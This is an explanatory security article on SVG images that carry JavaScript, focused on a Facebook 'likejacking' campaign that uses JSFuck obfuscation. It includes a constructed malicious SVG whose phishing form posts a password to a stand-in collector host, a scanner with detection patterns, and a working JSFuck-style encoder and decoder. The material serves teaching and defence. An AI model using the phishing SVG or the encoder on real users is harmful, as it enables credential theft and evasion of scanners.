Exploiting SVG Files for Malware: A New Breed of Security Threats

Malware that generates unauthorized Facebook likes for adult sites has taken a new turn: the sites now use SVG image files as the delivery vector. The files carry embedded JavaScript that runs in the visitor's browser when the image is opened, which shows how readily malicious actors adapt a benign file format to their purpose.
SVG (Scalable Vector Graphics) is a widely used image format valued for rendering crisply at any size. Unlike raster formats such as JPEG or PNG, an SVG file is XML text that describes shapes rather than pixels, and the format allows that text to contain script elements, event-handler attributes (onload, onclick and the like) and, through the foreignObject element, arbitrary HTML. A browser that opens such a file directly, or that has it inlined into a page, treats it as a document and executes that code, so an "image" can carry the same active content as a web page. This is a property of the format rather than a bug, and it is what makes SVG attractive to attackers.
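The following is an added example, not code from the Malwarebytes report or from any project the article mentions. It shows the constructs described above in a constructed SVG file (inline script, an onload handler, a javascript: link, and a foreignObject carrying an HTML login form prefilled with the recipient's address, the pattern seen in SVG phishing), together with a conservative text scanner that flags them. The rule names, the sample file and the deliveryFor policy are assumptions made for the example; browsers do not run scripts in SVGs loaded through an img tag, which is what the policy relies on.

```javascript
// Added example: flag the SVG constructs that can execute script or embed HTML
// when the file is opened as a document. The sample below is constructed here.

const SAMPLE_SVG = `<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="400" height="300" onload="init()">
  <rect width="400" height="300" fill="#fff"/>
  <a xlink:href="javascript:init()"><text x="10" y="20">Open document</text></a>
  <foreignObject x="0" y="40" width="400" height="200">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <form action="https://collector.example/post" method="post">
        <input name="email" value="victim@example.com"/>
        <input name="password" type="password"/>
      </form>
    </div>
  </foreignObject>
  <script><![CDATA[
    function init() { /* an obfuscated payload would live here */ }
  ]]></script>
</svg>`;

// Each rule is a regex over the raw text plus the reason it matters. Matching on
// text rather than a parsed tree is deliberate: a hostile file can be crafted so a
// lenient XML parser and the browser disagree, so the scanner prefers false positives.
const RULES = [
  { id: 'script-element',  re: /<script[\s>]/i,
    why: 'inline script runs when the SVG is opened as a document or inlined in HTML' },
  { id: 'event-handler',   re: /\son[a-z]+\s*=/i,
    why: 'on* attributes (onload, onclick, ...) run script' },
  { id: 'javascript-url',  re: /href\s*=\s*["']\s*javascript:/i,
    why: 'javascript: link' },
  { id: 'foreign-object',  re: /<foreignObject[\s>]/i,
    why: 'foreignObject embeds arbitrary HTML (forms, iframes) inside the image' },
  { id: 'html-form',       re: /<form[\s>]/i,
    why: 'HTML form, typical of credential-phishing SVGs' },
  { id: 'remote-resource', re: /(?:href|action|src)\s*=\s*["']\s*(?:https?:)?\/\//i,
    why: 'loads from or posts to a remote origin' },
];

// Returns the list of triggered rules (empty for a plain vector drawing).
function scanSvg(text) {
  return RULES.filter(r => r.re.test(text)).map(r => ({ id: r.id, why: r.why }));
}

// Hypothetical upload policy: a flagged file may still be displayed through an
// <img src="..."> tag, where browsers do not execute its scripts or submit its
// forms, but must not be served as a navigable document or inlined into a page.
function deliveryFor(text) {
  return scanSvg(text).length === 0 ? 'inline-or-document' : 'img-tag-only';
}

for (const f of scanSvg(SAMPLE_SVG)) console.log(f.id + ': ' + f.why);
console.log('delivery:', deliveryFor(SAMPLE_SVG));
```

A benign drawing (a single circle element, for instance) triggers none of the rules, while the constructed sample trips all six. The scanner is a triage tool, not a sanitizer: for uploads you intend to re-serve, rasterizing to PNG or running a real SVG sanitizer is the safer choice.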
Security researchers at Malwarebytes have uncovered a campaign in which several adult sites distribute .svg files carrying this kind of embedded script. When a visitor opens the file, the hidden code silently registers a like on Facebook pages that promote these sites. It can do so because the visitor is already logged in to Facebook in the same browser, so the script's actions are carried out under that authenticated session.
Decoding these attacks requires working through layers of obfuscation. A notable one is JSFuck, an encoding that rewrites any JavaScript program using only six characters: [ ] ( ) ! +. The result looks like noise but is still valid JavaScript that the browser evaluates normally; it is meant to defeat casual inspection and signature matching, not to be undecodable. The end goal of the obfuscation is to run the payload Malwarebytes detects as Trojan.JS.Likejack, which abuses the logged-in Facebook session to add page likes without the user's consent.
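To make the encoding concrete, here is an added example, written for this article rather than taken from the jsfuck tool or from the Likejack sample: a cut-down JSFuck-style encoder that spells a payload from the six characters, and the decoding trick analysts apply to such output. The trick relies on the shape of the output, an expression that builds a Function followed by a final () that calls it; dropping the final call and evaluating the rest yields the function without running it, and its source text is the original payload. The payload strings are constructed for the example, and the encoder covers only the characters it can reach from "true", "false", "undefined", "NaN" and the source text of Array.prototype.filter (real JSFuck adds escape/unescape to reach every character).

```javascript
// Added example: a cut-down JSFuck-style encoder plus the decoding trick analysts
// use on it. This re-implements the technique for illustration; it is not the
// jsfuck tool's code and not the Likejack sample. The payload strings are constructed.

// String-valued expressions built from the six characters [ ] ( ) ! + only.
const ATOMS = {
  'false':     '(![]+[])',      // ![] is false, +[] coerces it to "false"
  'true':      '(!![]+[])',
  'undefined': '([][[]]+[])',   // [][""] is undefined
  'NaN':       '(+[![]]+[])',   // +["false"] is NaN
};

// Integer n as an expression: 0 is +[], 1 is +!+[], larger single digits are
// sums of !+[] (true), and n >= 10 concatenates digits through string coercion.
function num(n) {
  if (n === 0) return '+[]';
  if (n === 1) return '+!+[]';
  if (n < 10) return Array(n).fill('!+[]').join('+');
  const d = String(n).split('').map(Number);
  return num(d[0]) + d.slice(1).map(x => '+[' + num(x) + ']').join('');
}

const CHAR = {}; // character -> expression evaluating to that one-character string
function learn(text, expr) {
  for (let i = 0; i < text.length; i++) {
    if (!(text[i] in CHAR)) CHAR[text[i]] = expr + '[' + num(i) + ']';
  }
}
for (const [text, expr] of Object.entries(ATOMS)) learn(text, expr);
for (let d = 0; d <= 9; d++) CHAR[String(d)] = '[' + num(d) + ']+[]';

// Encode a string as a + chain of single-character expressions.
function str(s) {
  return [...s].map(c => {
    if (!(c in CHAR)) throw new Error('no encoding for character: ' + JSON.stringify(c));
    return CHAR[c];
  }).join('+');
}

// "filter" is spellable from the atoms; the source text of Array.prototype.filter
// ("function filter() { [native code] }" in V8) then supplies c, o, space and brackets.
const FILTER = str('filter');
learn('function filter() { [native code] }', '([][' + FILTER + ']+[])');
const CONSTRUCTOR = str('constructor');

// [].filter.constructor is Function, so evaluating the result compiles and runs `code`.
function encode(code) {
  return '[][' + FILTER + '][' + CONSTRUCTOR + '](' + str(code) + ')()';
}

// Decoding: drop the final call so evaluation only builds the function, then read
// its source back. Run this on real samples only inside an isolated VM: crafted
// input can execute code before the final call, and need not be pure JSFuck.
function decode(obfuscated) {
  const t = obfuscated.trim();
  if (!t.endsWith('()')) throw new Error('not a self-invoking expression');
  if (/[^\[\]()!+\s]/.test(t)) throw new Error('contains non-JSFuck characters');
  const fn = Function('return (' + t.slice(0, -2) + ')')();
  if (typeof fn !== 'function') throw new Error('did not evaluate to a function');
  const src = fn.toString(); // e.g. "function anonymous(\n) {\nalert(1)\n}"
  return src.slice(src.indexOf('{') + 1, src.lastIndexOf('}')).trim();
}

const sample = encode('alert(1)');
console.log(sample.length + ' characters, decodes to: ' + decode(sample));
```

The size blow-up is the point of the exercise: a handful of payload characters become hundreds of brackets and plus signs, which is why a scanner that only looks for readable strings such as "facebook" or "like" in an SVG will miss the sample, while a rule that flags any script element at all (as in the earlier example) does not.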
Several cases of SVG misuse have been documented over the years. In 2023, a cross-site scripting vulnerability in the Roundcube webmail software was exploited in the wild using crafted SVG content in e-mail messages, affecting Roundcube installations worldwide. More recently, phishing campaigns have used SVG attachments that render a fake login prompt, prefilled with the recipient's details, showing that the technique keeps being adapted.
Tracking the offending platforms, Malwarebytes identified numerous sites running on WordPress that persistently use these tactics. Facebook is aware of the abuse and keeps removing the accounts and pages involved, yet the operators quickly return under new profiles. That cycle illustrates how hard it is to shut down threats hidden inside ordinary-looking files.